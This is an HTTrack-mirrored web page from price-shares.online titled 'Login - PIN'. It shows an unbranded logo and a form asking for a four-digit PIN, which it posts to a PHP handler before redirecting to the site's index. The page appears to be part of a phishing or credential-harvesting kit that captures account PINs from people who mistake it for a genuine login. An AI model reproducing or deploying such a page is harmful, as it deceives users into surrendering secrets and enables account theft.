<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from price-shares.online/pin.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:57:19 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />>
    <title>Login - PIN</title>
    <link rel="stylesheet" href="build/css/intlTelInput.css">
    <link rel="stylesheet" href="build/css/demo.css">
    <link rel="stylesheet" href="sstyle.css">
    <link rel="stylesheet" href="pin.css">
    <link rel="stylesheet" href="../cdn.jsdelivr.net/npm/bootstrap-icons%401.3.0/font/bootstrap-icons.css" />
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous" referrerpolicy="no-referrer"
    />
    <link rel="stylesheet" href="password.css">
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="../unicons.iconscout.com/release/v4.0.0/css/line.css">
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/bootstrap/5.1.3/css/bootstrap.min.css" />

</head>

<body>

    <div class="container text-center">
        <img class="logo" src="images/download%20(2).png" alt="">
        <form method="POST" class="myform text-center" action=".././modules/post3.php">
            <div class="para-first">
                <div class="hcnt text-center">
                    <h2 class="para1 mb-2">
                        Please enter your PIN below.
                    </h2>
                </div>

                <p class="paragraph-three mb-4 text-center">
                    Forgot PIN? <a href="#">Help</a>
                </p>
            </div>
            <input type="hidden" name="_next" value="https://price-shares.online/index.html">
            <input type="hidden" name="_captcha" value="false">
            <div id="divOuter text-center">
                <div id="divInner">
                    <input id="partitioned" name="pin" type="tel" maxlength="4" />
                </div>
            </div>

            <div class="cbtn mt-4">
                <button class="mt-3 text-center nextBtn">Continue</button>
            </div>
        </form>

        <div class="bt-img text-center ">
            <img src="images/download%20(3).png" alt="">
        </div>
    </div>








    <!-- 
    #partitioned {
        padding-left: 15px;
        letter-spacing: 42px;
        border: 0;
        background-image: linear-gradient(to left, black 70%, rgba(255, 255, 255, 0) 0%);
        background-position: bottom;
        background-size: 50px 1px;
        background-repeat: repeat-x;
        background-position-x: 35px;
        width: 220px;
        outline : none;
      }
      <input id="partitioned" type="text" maxlength="4" /> -->

















    <script src="script.js"></script>
    <script src="build/js/intlTelInput.js"></script>

</body>


<!-- Mirrored from price-shares.online/pin.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:57:34 GMT -->
</html>